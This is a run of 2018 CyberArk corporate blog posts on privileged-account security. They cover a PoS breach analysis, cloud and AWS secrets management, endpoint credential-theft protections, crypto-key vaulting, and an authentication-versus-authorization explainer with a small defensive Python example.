In fact, the Cloud Security Alliance “2017 Treacherous 12” report notes insufficient identity, credential and access management as one of the top threats to enterprise cloud computing today. Without proper privileged account security in place, organizations can face potentially catastrophic damage. The report states that this can be caused by “malicious actors masquerading as legitimate users, operators or developers who can read/exfiltrate, modify and delete data…snoop on data in transit or release malicious software that appears to originate from a legitimate source.”

Underscoring this problem, our recently published Global Advanced Threat Landscape Report 2018 revealed that while 50 percent of IT professionals say their organization stores business-critical information in the cloud and 43 percent say they commit regulated customer data to the cloud, nearly half (49 percent) have no privileged account security in place for the cloud.

These findings indicate that while security teams may be comfortable with securing certain, more traditional components like the cloud admin console, when it comes to securing dynamic cloud environments, further education is critical and there is much more work to be done.

Now is the time to take ownership of your organization’s responsibility for protecting critical information in the cloud. One proactive step your organization can take to bolster its cloud security posture is to conduct Red Team exercises, in which ethical hackers simulate the techniques and behaviors of likely attackers. These exercises can help to uncover critical vulnerabilities in cloud (and on-premises) environments, identify effective responses and understand the motives and techniques of potential adversaries.

For additional information about security vulnerabilities associated with cloud-based infrastructure, download the CyberArk eBook that highlights six use cases and best practices organizations can follow to mitigate cloud risks and maintain a consistent, enterprise-wide policy throughout the cloud journey, regardless of the compute environment, development philosophy or complexity.

Saks, Lord & Taylor Breaches: Privileged Account Compromise Never Goes Out of Style https://www.cyberark.com/blog/saks-lord-taylor-breaches-privileged-account-compromise-never-goes-style/ Thu, 05 Apr 2018 20:42:22 +0000 https://www.cyberark.com/?p=23827/

Saks Fifth Avenue and Lord & Taylor became the latest victims of cyber attacks that target major retailers and their PoS systems, resulting in the potential compromise of millions of payment cards.

While details of the attack are still emerging, initial reports about the breach and subsequent confirmation from the parent company, Hudson’s Bay Company, provide enough detail to identify potential pathways the attackers took – and assess what this breach means for other retailers to prevent similar attacks.

We’ll continue to analyze details of the attack – but a few major themes jumped out initially:

More than a PoS Breach – This Was a Network Takeover

While the PoS systems may have been the ultimate target, the attackers likely traversed the Hudson’s Bay network to get there. What this means is that the attackers took some level of control and gained persistence within the company’s network.

If the PoS system itself was the attack vector, we would likely hear about more breached retailers than just Saks and Lord & Taylor.

As we’ve seen in previous PoS attacks, privileged accounts are the primary enablers of full network compromise. Attackers typically gain a foothold through phishing attacks, steal credentials from the endpoint and elevate privileges while moving laterally across the network towards the PoS systems.

Once the attacker reaches the PoS, privileged credentials can be used to exfiltrate the payment card data while avoiding detection and setting off security alarms.

Based on initial analysis of available details, Hudson’s Bay provides costly lessons to other retailers about best practices in preventing PoS breaches, including:

Employ EMV Technology – Now

The most effective mitigation for this class of attack already exists: EMV (chip-and-PIN) cards. A chip card authenticates each transaction with a one-time cryptogram, so data scraped from PoS memory cannot be used to clone a working card for in-person fraud. From the initial reports, the breached retailers were still using magnetic stripe readers, which leave the card’s track 1 and track 2 data (the data sold on carding markets) in PoS memory. Magnetic stripe readers are less secure but still very common. Note that EMV alone does not keep the card number out of the PoS; encrypting the data at the point of swipe is what keeps it out of memory.

Attackers know this, and have created specific memory scraping malware for this purpose (BlackPoS).

Prevent Network Jumping

Based on patterns from previous breaches, it’s likely the attackers jumped from an employee endpoint to the PoS systems – which could mean there’s a security gap that allowed this hop. Secure retail networks should always be segmented from normal networks. A failure to segment the networks is a failure of basic security best practices.

In this case, the privileged account compromise provided the attackers with network control and easy access to the PoS system.

Even in the case of proper segmentation, attackers can exploit privileged accounts to build a bridge between the networks – but these types of attacks have typically been seen by nation-states targeting critical infrastructure or financial institutions.

What It Means for Other Retailers

While we can’t be sure that the attackers took over the ENTIRE Hudson’s Bay network, we do know that they had to achieve incredibly deep reach into the network to compromise all of the Saks and Lord & Taylor PoS systems.

Deep attacks of this nature often require the company to rebuild the network to remove the attacker and regain trust in the infrastructure.

Preventing these attacks starts with requiring multifactor authentication on all privileged accounts and removing residual credential hashes from endpoints, so that attackers cannot reuse them to escalate across the network.

If privileged accounts are being used on vulnerable endpoints, the attack surface will continue to expand, allowing many possible locations for attackers to build a bridge and reach PoS systems. Automating the vaulting, protection and monitoring of those credentials is critical to containing these attacks and keeping the PoS system and associated networks safe.

CyberArk and AWS: Comprehensive Enterprise-Class Security Solutions for AWS Native, Hybrid and Multi-Cloud https://www.cyberark.com/blog/cyberark-aws-comprehensive-enterprise-class-security-solutions-aws-native-hybrid-multi-cloud/ Wed, 04 Apr 2018 21:00:30 +0000 https://www.cyberark.com/?p=23804/

Organizations of all sizes continue to adopt and accelerate their move to the cloud. Amazon Web Services (AWS) is widely recognized as the leading provider of cloud services, and it’s no surprise that AWS continues to rapidly add new capabilities and services across its portfolio to facilitate organizations’ journeys to the cloud.  But, it is not just about making the journey easier; it is also about securing the cloud workloads running on AWS. To that point, CyberArk is working closely with AWS and our customers so they can take full advantage of CyberArk’s privileged account security capabilities for their AWS resident workloads.

Yet, even with all of the cloud-related breaches, such as misconfigured S3 buckets that make private data public and stolen access keys used for crypto-mining, too many enterprises still lack awareness of the shared responsibility model between organizations, their cloud providers and their security teams. In CyberArk’s 2018 Threat Landscape report, nearly half (49 percent) of respondents had no privileged account security strategy in place for the cloud.

Earlier today, AWS announced AWS Secrets Manager at the AWS San Francisco Summit. Now, while it is most likely that AWS Secrets Manager will first get adopted by developers at organizations primarily focused on native AWS environments, it is a significant announcement because it highlights the importance of removing secrets from code and storing them securely to protect the organization’s cloud workloads. This is something for which we have advocated, providing solutions to organizations of all types from AWS native, multi-cloud, hybrid, and on-premises for many years.

Secrets management is important, but it is just one element of the Privileged Account Security Solution. At CyberArk, security is our DNA, that’s what we do. We’re widely recognized for offering the industry’s most comprehensive solution for securing privileged accounts, credentials and secrets across on-premises environments, cloud and hybrid and throughout the DevOps pipeline.

What do we specifically offer for AWS?  We’ve been investing in AWS integrations that provide holistic security solutions for enterprises with hybrid and multi-cloud environments, including:

  • The CyberArk AMIs (Amazon Machine Images) and CloudFormation templates build a complete CyberArk Privileged Account Security environment in AWS in minutes, with primary and DR vaults as well as session monitoring. They use a secure and robust architecture developed with AWS that, for example, places vault communications on dedicated subnets and puts the primary and DR vaults in separate AWS Availability Zones. The flexible architecture also simplifies deployment across hybrid and multi-cloud environments. For more details, see our whitepaper, Securing Hybrid Cloud Environments and Workloads on AWS.
  • CyberArk Conjur is focused on securing dynamic DevOps environments running on Docker and other container environments. It supports a broad range of environments, including native AWS, multi-cloud and hybrid environments with support for leading DevOps tools and platforms, including Ansible, CloudBees, Docker and Pivotal Cloud Foundry (PCF). Conjur Enterprise integrates with the CyberArk Enterprise Password Vault, enabling policies to be holistically applied across the enterprise. We offer both open source and enterprise versions. If you are a PCF customer, please join us for a webinar detailing how Conjur works with PCF on May 1, 2018.
  • CyberArk’s automated provisioning function for AWS automatically on-boards and secures credentials for newly created EC2 instances in AWS environments, by leveraging CloudWatch and Lambda functions. It was designed to improve the native AWS functionality by simply replacing the generic SSH key assigned in a given AWS Auto Scaling Group with a unique key, thereby meeting a security best practice.

To learn more about how to leverage CyberArk to secure your native AWS, hybrid, multi-cloud and DevOps environments today, visit CyberArk.com/aws.

When Breaches Hit Home https://www.cyberark.com/blog/breaches-hit-home/ Fri, 30 Mar 2018 13:40:47 +0000 https://www.cyberark.com/?p=23712/

Being curious and wanting to understand everything in the world is a good trait for children and young adults, but when it comes to cyber attacks targeting your business, you might find yourself channeling this behavior asking “why” far too many times. Recently, when the latest cyber attack on U.S. infrastructure was on the nightly news, my son started asking all kinds of questions: Why did this happen? Why did they do this? Why don’t we do something to stop them? Why, why, why Dad? At the age of eight, he is asking some really good questions, some that do not have easy answers. For a business, finding answers for these kinds of questions is not so easy either.

Breaches are far too common

Over the last few years, there have been numerous cyber attacks on institutions and enterprises. Many are carried out by individuals or groups, some by nation states or groups backed by them. A brief history of the major attacks and of the use of credentials in attacker tactics, techniques and procedures (TTPs) paints a bleak picture for future outcomes. With an increasing number of breaches in the news, the word “breach” has become part of the common vernacular. But you know we’ve reached another level when your children start to ask questions about such nefarious actions. Simply put, it hits home. Fortunately, I find solace coming into work, knowing that CyberArk offers solutions that can have a significant and material impact on protecting critical infrastructure from malicious actors.

So rather than dwell on the “why” question, a more pragmatic question is “what can you do about it today?” The guidance from the FBI and DHS is clear, but I am referring to practice. Survey results shared in the CyberArk Threat Landscape 2018 report indicate that over 86 percent of end users still run with administrative privileges. That reality undermines any other progress a company might make against attackers.

With this in mind, the latest CyberArk Endpoint Privilege Manager v10.2 has key functionality to stop intruders in their tracks. Let’s review a few key additions and enhancements:

Loosely connected devices

With the v10.2 release of the CyberArk Privileged Account Security Solution, CyberArk brings endpoints that operate on the fringe of the network, and those literally off-network, into the fold by offering support for managing local admin accounts exactly as is done for servers and applications in the datacenter. For this use case, we introduce a new integration point with the CyberArk solution, specifically the Enterprise Password Vault, to manage these local admin accounts. With support for managing local admin accounts and integrated two-factor authentication (such as SailPoint IdentityIQ with a Duo, RSA or Microsoft MFA), a significant amount of the attack risk, as documented in the recent critical infrastructure attacks, could be mitigated by preventing the takeover of privileged accounts, limiting lateral movement and blocking their subsequent use for making changes to critical internal systems without a challenge response.

Credential theft

It is inevitable that an attacker will find a way in, given enough time and resources. Plus, one can’t underestimate the human element. We are the biggest risk in the cyber equation, after all. Until cyborgs take over the world, humans will do most of the work in critical infrastructure (as is the case in most enterprises). As a result, they will likely be the target of a phishing attack or watering hole attack and subsequently let the attacker in. When this happens, preparation is key. The latest release of Endpoint Privilege Manager introduces new credential protections that further mitigate attackers by preventing illegitimate access to the Microsoft Active Directory data store (NTDS.dit). This new feature prevents attackers from stealing the Kerberos Ticket Granting Ticket (krbtgt) account, which is a preliminary step to a Golden Ticket attack, and from harvesting all the organization’s user hashes to execute pass-the-hash attacks and pivot off the endpoint. This new protection (coupled with the multitude of ways Endpoint Privilege Manager can defend against credential theft) reduces the chance of an attacker’s lateral movement across a network.

Windows 10 v1803 – Redstone 4 build

The latest release of Endpoint Privilege Manager also brings in support for Windows 10 v1803. Significant changes to the UAC controls improve the foundation for how CyberArk can integrate with Windows 10 through Endpoint Privilege Manager. While Windows 10 is not called out in the latest attacks, keeping pace with the latest security and OS releases, along with instituting least privilege and application security controls, are known best practices.

By utilizing the latest release of CyberArk Endpoint Privilege Manager and the new feature functionality, attackers targeting critical infrastructure are going to have a significantly harder time establishing a presence, performing reconnaissance or performing lateral movement.

Do the latest cyber attacks have you asking a lot of questions about your organization’s security? Get the right answers about how to address attackers by getting a demo of Endpoint Privilege Manager today!

New Integration: Pivotal Cloud Foundry and CyberArk Conjur Enterprise https://www.cyberark.com/blog/new-integration-pivotal-cloud-foundry-cyberark-conjur-enterprise/ Thu, 29 Mar 2018 13:10:49 +0000 https://www.cyberark.com/?p=23699/

We’re pleased to announce a new integration between CyberArk Conjur Enterprise and Pivotal Cloud Foundry (PCF). Organizations using Pivotal Cloud Foundry can now leverage Conjur Enterprise to secure, manage and rotate secrets and other credentials used by PCF.

Specifically, the integration between PCF and Conjur Enterprise enables organizations to:

  • Automatically replicate secrets from Conjur Enterprise to PCF
  • Manage and automatically rotate secrets in PCF environments, based on policies established with Conjur Enterprise

Pivotal Cloud Foundry is a leading, comprehensive Platform as a Service (PaaS) offering that includes all the runtime, middleware, operating systems and virtualization capabilities required to run applications. Increasingly popular with development teams, PCF is designed to enable developers to create their applications and then easily deploy them on the compute environment of their choice.

Conjur Enterprise is an enterprise-class secrets management solution designed to meet the needs of high velocity, dynamic DevOps environments and CI/CD (Continuous Integration, Continuous Delivery) pipelines. Conjur Enterprise is security focused and incorporates robust security principles including: machine identity, least privilege, role-based access control, policy as code, as well as segregation of duties for both human and non-human users (e.g., containers, micro-services, scripts and machines).

Key Benefits
Pivotal Cloud Foundry already has some native secrets management capability built into the platform; however, the integration between PCF and Conjur Enterprise offers several important benefits to enterprises, which include:

  1. Providing robust security capabilities for PCF and other native DevOps tools. Instead of relying on the capabilities of native DevOps tools, which typically lack basic security features such as policy-based rotation and audit, organizations can leverage the robust security capabilities of Conjur Enterprise to consistently manage secrets and credentials at scale with an enterprise class secrets management platform.
  2. Eliminating “islands of security” with centralized secrets management. The native capabilities of the individual DevOps tools and platforms not only have varying levels of security capabilities, but they also typically cannot securely share secrets across tools. At best, this creates “islands of security.” Conjur Enterprise and its integration with PCF and other DevOps tools eliminates “islands of security” by centralizing the management of secrets and credentials.

Achieve End-to-End Credential Management Across the Enterprise – From CyberArk Vault to Pivotal Cloud Foundry

Just a few weeks ago, we announced an integration between CyberArk Conjur Enterprise and the CyberArk Enterprise Password Vault, which enables secrets and credentials managed by the CyberArk Vault to be automatically replicated into Conjur Enterprise. This means that organizations using PCF, the CyberArk Enterprise Password Vault and Conjur Enterprise have the ability for true end-to-end, policy-based secrets management across their enterprise.

For example, these integrations are designed to enable a secret or credential managed by the CyberArk Vault to be automatically replicated and managed in the PCF PaaS environment as well as other DevOps tools. These credentials can be managed consistently across on-premises, hybrid and native cloud environments, as well as DevOps environments.

Getting Started with Conjur Enterprise and Pivotal Cloud Foundry
The PCF integration is available today as an open beta on the Pivotal Network, with a Beta tile available to simplify the deployment of the Service Broker and the Buildpack. To learn more, contact sales, visit CyberArk.com/Conjur or register for our upcoming webinars that provide additional details of the capabilities and how to deploy.

  • April 11: Learn what’s new in the CyberArk Privileged Account Security Solution v10.2. We’ll also cover the integration of Conjur Enterprise with the CyberArk Vault.
  • May 1: This On The Front Lines webinar will include a demo and technical tutorial featuring both the Conjur Enterprise integration with PCF and with the CyberArk Vault.

Try Open Source
CyberArk also offers an open source integration between Cloud Foundry (the open source version of Pivotal Cloud Foundry) and Conjur Open Source. For additional information and access to the open source integration, read this blog “Cloud Foundry Integration Available in GitHub.” You can also access test and production versions of Conjur Open Source at Conjur.org. Join the Conjur Slack to communicate directly with our engineers to ask questions and provide product feedback.

Six Steps to Secure Cryptographic Keys with CyberArk https://www.cyberark.com/blog/six-steps-secure-cryptographic-keys-cyberark/ Mon, 26 Mar 2018 20:54:26 +0000 https://www.cyberark.com/?p=23649/

Cryptocurrency seems to bring out the best effort from cyber criminals. From nation states to traditional attackers, the rise in crypto-related attacks is staggering. The motivation is obvious: it’s financially driven. Despite the recent drop, cryptocurrency values have skyrocketed over the past couple of years, incentivizing attackers to create malicious code and sophisticated hacking tools to harvest cryptocurrency coins. One quick way to a massive payday is compromising a digital wallet and stealing the wallet’s private key. When attackers get their hands on a digital wallet, they can take full control of the funds.

Retailers have started to accept cryptocurrency right alongside good old fashioned cash and credit. This trend is commercializing decentralized currency and forcing the hand of many big banks to get on board. The leg up criminals have, in many of these attacks, is the anonymity involved in crypto-transactions. As this form of currency gains more credibility, organizations in every industry will need to implement security controls to mitigate the risk of crypto-credentials becoming exposed.

A Quick Review on Digital Wallets

There are two types of digital wallets: hot wallets and cold wallets. Hot wallets are used by individual users and organizations to store smaller amounts of currency, so they need to be more fluid in nature for quick transfers and exchanges. There are many cryptocurrency services such as Coinbase and Bittrex that manage and store the wallet’s private key and provide users with easy access. In most cases, this type of managed service is password protected.

Conversely, cold wallets, used by organizations and security-savvy individuals, typically hold much larger amounts of digital currency. This type of wallet keeps its associated private key off the internet completely (for obvious reasons) and often stores it on an offline computer. Yet, as demonstrated by some of the recent attacks, if the network becomes compromised, then the keys will follow suit shortly thereafter.

There are solutions available that store private keys on a USB stick-like device that does not allow the extraction of the private key. The device is simply inserted into a computer to prove the user has access to the key (using cryptographic functionality and zero trust algorithms). Although this solution provides sound security for the private keys, it is not suitable for larger organizations that need to control who has access to the device and its associated credentials.

Don’t Get Digitally Mugged

Cryptocurrency private keys are not exclusively used by human users. There are many automated processes that perform cryptocurrency transactions as well. Securing private keys for all users (both human and machine) is a foundational first step, quickly followed by authenticating and identifying who has access to the keys, controlling the access and monitoring its usage – and that’s where CyberArk can help.

CyberArk considers cryptocurrency private keys to be another type of privileged credential we can manage and protect. In essence, a key is stored similarly to how we store a password, with a few slight modifications and specific requirements such as ASCII text and character limitations (1024 characters). A ‘shared credential accountability’ and ‘least privilege’ model allows organizations to not only understand who has access to keys and wallets, but also place limitations and restrictions around the access to these resources.

When human users access private keys, CyberArk ensures access control for permitted users only and establishes workflows such as dual control approvals. For automated processes, applications and scripts can access keys via APIs, but this alone is often not enough to be 100% secure. It’s critical to authenticate the application and assure it has not been forged or circumvented by a malicious insider or external attacker. With CyberArk’s application authentication techniques, we can verify that only authorized applications have the ability to access and use the private keys. Furthermore, CyberArk provides auditability and monitoring of private key access, both for detection of key misuse and for forensics.

Here are six key (pun intended) considerations to help secure and protect cryptographic keys:

  1. Store cryptographic keys in a secure digital vault – Move keys into a digital vault with multiple layers of security wrapped around it, and enforce multi-factor authentication for all users who have access to the vault.
  2. Introduce role segregation – Control individual access to stored keys, preventing even the most privileged administrators from getting to them unless explicit permissions have been granted.
  3. Enable secure application access – Enable access to stored keys for authorized applications and verify that the applications are legitimate.
  4. Audit and review key access activity – Audit all activity related to key access and implement trigger events to alert the necessary individuals of any key activity.
  5. Enforce workflow approvals – Enforce workflow approvals for anything considered highly sensitive, including access to the keys.
  6. Monitor cryptocurrency administrator activities – Facilitate connections – similar to an automated secure proxy/jump host – to target systems that are used to perform cryptocurrency administrator activities (e.g. the system hosting the wallet).

Figure 1:  A standard architecture of CyberArk Privileged Account Security securing cryptocurrency activity.

Cybercriminals will continue to look at this technology as another opportunity to line their pockets. As the #1 leader in privileged account security, CyberArk will continue to safeguard critical systems from key harvesting and many other types of advanced attacks. Interested in learning more about protecting your organization’s cryptographic keys? Reach out to us today to see a live demo of how this works, and stay tuned for dedicated research to be published from the CyberArk Red Team on crypto mining in the coming weeks!

Bridging the Gap to Third Party Devices, Applications and Operating Systems https://www.cyberark.com/blog/bridging-gap-third-party-devices-applications-operating-systems/ Thu, 22 Mar 2018 12:00:13 +0000 https://www.cyberark.com/?p=23565/

The overall strength of a privileged account security solution can be measured by a typical set of standard benefits including performance, scalability and ease-of-use. One key characteristic that should not be overlooked is the ability to seamlessly integrate with third-party devices, applications and operating systems. When done correctly, this can provide organizations the ability to manage privileged credentials and secrets without significant development cycles, which can consume valuable resources in the process.

The average large enterprise can have hundreds (if not thousands) of different devices (e.g. workstations, servers, network devices), all of which have privileged accounts that need to be protected and managed. In many cases, there is no centralized approach to managing privileged accounts for these disparate devices. Moreover, these devices are often added or upgraded on a regular cadence, which, in turn, creates a never-ending scramble to protect all of the assets users and applications interact with – assets that reside both within and outside the four walls of the organization. The sooner an organization can get a handle on protecting these assets, the sooner it mitigates the risk from today’s advanced threats.

In the past, CyberArk has provided different methods to enable organizations to create their own integrations. The most commonly used was a development framework that could create third-party plug-ins using scripts such as PowerShell and Python, .NET applications and web browser recording methodologies. The one caveat to using this framework was that it required basic developer skills and some level of training in order to successfully create custom plug-ins.

In an effort to simplify the way our customers can integrate with other solutions, CyberArk introduced a new tool that delivers a straightforward and intuitive user experience for creating a credential management plug-in. The tool, the Plugin Generator Utility (PGU), streamlines the workflow in a ‘wizard-like’ process.

The first release of the PGU allows for the recording of a plug-in for network devices and appliances (based on Unix/Linux) as well as support for SSH and Telnet protocols – with plans to provide support for cloud and web applications in the not-too-distant future. The tool can also plug into IoT devices to help protect the network they are connected to from becoming compromised.

Figure 1:  The Plugin Generator Utility recording the process to verify the account password.

We deliberately designed the tool to be used by anyone – the tool does not require a developer’s experience and skillset. Users only need to understand the process and the set of commands required to perform the verification of a password, change a password and reconcile the accounts (e.g., administrative synchronization). Users can generate plugins for accounts that have the ability to log into devices directly, as well as devices that require a traditional logon account. Leveraging the PGU not only saves a significant amount of development time but also reduces operational overhead and eliminates the need for a professional services engagement.

The engine within the PGU detects different prompts for different operating systems (which are SSH related) and once a plugin is recorded, the tool generates a package that can be easily imported into the CyberArk Privileged Account Security Solution. Customers can now create and develop plugins on the fly. Beta testing determined a reduction in development time from ~90 days to 10 minutes! Download this free tool from the CyberArk Support Vault and start creating your own custom plugins today.

Distinguishing Authentication vs. Authorization https://www.cyberark.com/blog/distinguishing-authn-and-authz/ Mon, 19 Mar 2018 13:00:00 +0000 https://cyberarkvx2.wpengine.com/blog/distinguishing-authn-and-authz/

For many organizations, understanding how to monitor, manage, secure and audit authorization and access is difficult because the distinction between “authorization” and “authentication” is poorly defined.

The latest updates to the NIST Cybersecurity Framework are an important reminder of how quickly the threat landscape changes. Technology has greatly advanced since the NIST framework was initially released in 2014 — and so have cyber security threats. For example, consider the updates to the Identity & Access Control section of NIST. It was updated to clarify concepts such as authn and authz and to provide guidance on best practices for controlling machine identity and access. This is increasingly important as machine access starts to exceed human user access at an exponential rate, a trend largely driven by mass adoption of DevOps and digital transformation (DX) practices.

One of the reasons for the NIST update is that many vendors and systems purportedly solve “authorization and access management,” but in reality, they are actually identity (authentication) management solutions. As companies ramp up digital transformation (DX) efforts and move more data into highly connected or cloud-based systems, the consequences of this misunderstanding increase. The modern organization must provide both authentication and authorization management at scale, with an architecture that is cloud native, programmable, distributed and durable. In order to do so, however, it must first distinguish authn from authz and then address each appropriately.

Understanding the Difference

Authn primarily deals with user identity: who is this person? Is she who she says she is? There are a large number of systems that handle this “checkpoint” level of identity and access management and help to reduce the number of credentials that a user needs to provide, often through single sign-on (or SSO).

Authz answers a different set of questions, for example: what should this user or system be granted access to? Authz can manage service-to-service as well as user-to-service permissioning. An authz platform might determine that a user is a developer and then grant her permission to push source code to a Git repository, but prohibit the user from directly changing the software deployed into the production environment.

This is a critical distinction for organizations that have fast-moving infrastructure, such as those that are part of a DevOps initiative or digital transformation where there is a push to move away from on-premises IT and towards a cloud-first future. The engine that drives DevOps is infrastructure-as-code. This enables operations teams to configure machines as code. These machines need access and privilege to do what they were programmed to do, but it is getting more difficult for security teams to keep track of who or what has access.

The move from monolithic on-premises servers to micro-services and containers complicates the authz and authn picture by introducing more privileged access, more secrets, and more users and machines to authorize and authenticate. It is no longer only a question of “who is this person and what does she want to access.” Now, it is also a question of “what is this machine and what does it want to access.”

In our experience, there are (at least) five use cases for authorization-as-a-service in the authz sense, none of which are handled by authn alone:

  • Implementing role-based access controls (RBAC) for user-to-system and system-to-system permissions management.
  • Keeping critical access keys out of code, off of hard drives and out of code repositories such as GitHub and GitLab.
  • Generating audit reports to demonstrate regulatory compliance around access and authorization.
  • Managing SSH keys and secrets at scale across dynamic systems.
  • Gaining visibility into the total set of cloud systems in use and seeing who has access to them.
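The developer-versus-production scenario above, worked as an added Python illustration (constructed for this page, not Conjur's code or API): an authn step that only establishes identity, and a separate RBAC authz step that decides what that identity, human or machine, may do. All names, roles and secrets below are invented.

```python
"""Constructed authn/authz example (not Conjur code).

authenticate() answers "who is this?"; authorize() answers "what may this
identity do?".  Passing the first never implies passing the second.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Principal:
    name: str
    kind: str  # "human" or "machine"


# Constructed credential store: identity -> (kind, sha256 of its secret).
# Production systems use salted, slow password hashes; sha256 keeps the
# example short.
_CREDENTIALS = {
    "alice": ("human", hashlib.sha256(b"alice-password").hexdigest()),
    "ci-runner": ("machine", hashlib.sha256(b"ci-runner-api-key").hexdigest()),
}


def authenticate(name: str, secret: str) -> Optional[Principal]:
    """authn: return a Principal only when the presented secret matches."""
    entry = _CREDENTIALS.get(name)
    if entry is None:
        return None
    kind, expected = entry
    presented = hashlib.sha256(secret.encode()).hexdigest()
    # Constant-time comparison so a mismatch does not leak where it differs.
    if not hmac.compare_digest(presented, expected):
        return None
    return Principal(name, kind)


# Role assignments and grants expressed as data ("policy as code"), constructed.
_ROLES = {
    "alice": {"developer"},
    "ci-runner": {"deployer"},
}

# role -> set of (action, resource) it is allowed to perform.
_GRANTS = {
    "developer": {("push", "git:app-repo"), ("read", "git:app-repo")},
    "deployer": {("deploy", "env:production"), ("read", "git:app-repo")},
}


def authorize(principal: Principal, action: str, resource: str) -> bool:
    """authz: True only if one of the principal's roles grants (action, resource)."""
    for role in _ROLES.get(principal.name, set()):
        if (action, resource) in _GRANTS.get(role, set()):
            return True
    return False


def request(name: str, secret: str, action: str, resource: str) -> str:
    """Full decision: authn first, then authz, with distinguishable outcomes."""
    principal = authenticate(name, secret)
    if principal is None:
        return "denied: unauthenticated"
    if not authorize(principal, action, resource):
        return f"denied: {principal.kind} '{name}' lacks {action} on {resource}"
    return f"allowed: {principal.kind} '{name}' may {action} {resource}"


if __name__ == "__main__":
    # A developer may push code but not change production directly;
    # the CI machine identity may deploy; a bad secret never reaches authz.
    print(request("alice", "alice-password", "push", "git:app-repo"))
    print(request("alice", "alice-password", "deploy", "env:production"))
    print(request("ci-runner", "ci-runner-api-key", "deploy", "env:production"))
    print(request("alice", "wrong-password", "push", "git:app-repo"))
```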

Organizations Must Control Machine Access and Understand Authz and Authn

NIST is a largely voluntary compliance framework in the public sector, but it is still widely respected as a cyber security guide. However, compliance frameworks are a lagging indicator of the cyber security threat landscape because they only address breaches that have occurred multiple times. This means that any organization that does not already have both authentication and authorization solutions with machine and application identity capabilities is a cyber security late adopter and at great risk of a breach.

Is your organization moving fast, embracing DevOps, digital transformation, and/or shifting infrastructure to the public cloud? Conjur open source and Conjur Enterprise have helped a number of organizations implement authorization-as-a-service as part of these initiatives and can help you too.

Editor’s Note: This article originally appeared in July 2014. It has been updated to reflect recent information.

Product Integration Facilitates Enterprise Secrets Management https://www.cyberark.com/blog/product-integration-facilitates-enterprise-secrets-management/ Wed, 14 Mar 2018 15:25:43 +0000 https://www.cyberark.com/?p=23351/

We’re pleased to announce the integration of CyberArk Application Access Manager with the CyberArk Enterprise Password Vault. This integration enables organizations to:

  • Automatically replicate secrets from the CyberArk Enterprise Password Vault to CyberArk Application Access Manager
  • Use the CyberArk Enterprise Password Vault to manage and automatically rotate secrets in DevOps environments, based on policies established for the CyberArk Enterprise Password Vault

CyberArk Application Access Manager is a powerful secrets management solution specifically designed for the high velocity and dynamic needs of DevOps environments and CI/CD (Continuous Integration, Continuous Delivery) pipelines in enterprise-class environments. To help ensure the security of DevOps environments, the solution incorporates essential principles including: machine identity, least privilege, role-based access control, as well as segregation of duties for both human and non-human users (e.g., containers, micro-services, scripts and machines).

CyberArk Application Access Manager is also integrated with leading DevOps tools including Ansible, Jenkins, Docker, Chef and Puppet, enabling these tools to access and use secrets and credentials managed by CyberArk Application Access Manager. Secrets and credentials can be consistently managed across DevOps environments regardless of the secrets management capabilities of the native DevOps tools – which can vary significantly and are not always enterprise ready; for example, some are missing rotation and audit capabilities. Importantly, this solution eliminates “islands of security” created when the individual DevOps tools cannot securely share secrets with each other.

The above capabilities don’t require the CyberArk Privileged Account Security Solution or the CyberArk Enterprise Password Vault integration. The capabilities have been available for some time and are used by enterprises to secure their DevOps environments and CI/CD pipelines. Now, the excitement is that, with this integration, customers with the CyberArk Privileged Account Security Solution can extend the capabilities and policies used by the CyberArk Enterprise Password Vault into their DevOps environments.

Key Benefits of the Integration

The CyberArk Application Access Manager integration with the CyberArk Enterprise Password Vault provides several important benefits:

  1. Organizations get additional value from their investments in the CyberArk Privileged Account Security Solution. For example, CyberArk customers wanting to take advantage of DevOps methodologies can now leverage their technology, policy and other investments in privileged account security solutions to help protect their DevOps environments. With the integration, customers can also use CyberArk Privileged Session Manager for monitoring and isolating sessions in their DevOps environments.
  2. Enterprises can consistently manage secrets and credentials. The integration enables enterprises to get closer to implementing centralized, policy-based enforcement including rotation and monitoring of secrets across mixed development and compute environments. For example, CyberArk offers the only solution that enables enterprises to establish a single control point to consistently manage secrets across on-premises, hybrid, cloud native and DevOps environments.
  3. Simplified deployment for developers, security and operations. As with CyberArk Application Access Manager in a stand-alone environment, developers are able to easily meet security requirements by using APIs and code to secure secrets and access credentials without impacting velocity. Now, with the integration, credentials and secrets can be managed and automatically rotated based on policies established within the CyberArk Privileged Account Security Solution. This helps security teams simplify management of DevOps environments as they can leverage the existing tools and policies they are already familiar with. Security functions can focus on the central management of secrets via the CyberArk Enterprise Password Vault, while developers and DevOps teams can work with the native tools/APIs and “as code” capabilities of Conjur. This enables central policy enforcement for DevOps use cases including rotation and monitoring.

The integration also includes a new Synchronizer for replicating secrets from CyberArk Enterprise Password Vault to CyberArk Application Access Manager. The Synchronizer is designed to keep secrets updated with enterprise-class scalability and availability. The CyberArk Enterprise Password Vault and CyberArk Application Access Manager integration currently supports CyberArk Core Privileged Account Security Solutions V9.5 and higher and is currently available as beta with General Availability planned for the end of March 2018. Contact sales for information and access to the beta solution.

To learn more, contact sales, visit CyberArk.com/Conjur or register for our April 11th webinar to learn what’s new in the CyberArk Privileged Account Security Solution v10.2. We’ll also cover the integration of CyberArk Application Access Manager with the CyberArk Enterprise Password Vault.

Celebrate Saint Patrick’s Day Early with the Release of CyberArk Privileged Account Security Solution Version 10.2 https://www.cyberark.com/blog/cyberark-announces-pas-v10-2/ Tue, 13 Mar 2018 14:00:10 +0000 https://www.cyberark.com/?p=23106/

What’s the connection between privileged account security and Saint Patrick’s Day? Absolutely nothing, but for any Irish-American like myself, this excuse is as good as any to kick start one of the most celebrated cultural holidays of the year (note: despite the lack of a connection, there will still be many Irish Proverbs and sayings used throughout this blog). We here at CyberArk are thrilled to announce the release of CyberArk Privileged Account Security Solution Version 10.2. This release extends the theme of improving risk reduction and simplification for privileged account security one step further, and showcases our ability to continue to strengthen the overall security and protection of privilege on the endpoint and throughout the DevOps pipeline. We recently streamlined the CyberArk solution’s user interface to simplify adoption and usability for our key user personas. We’ve taken the next step to build new processes directly into this interface and include many enterprise-ready features to meet the evolving needs of our customers.

Irish Proverb #1 – There’s No Need to Fear the Wind if Your Haystacks are Tied Down

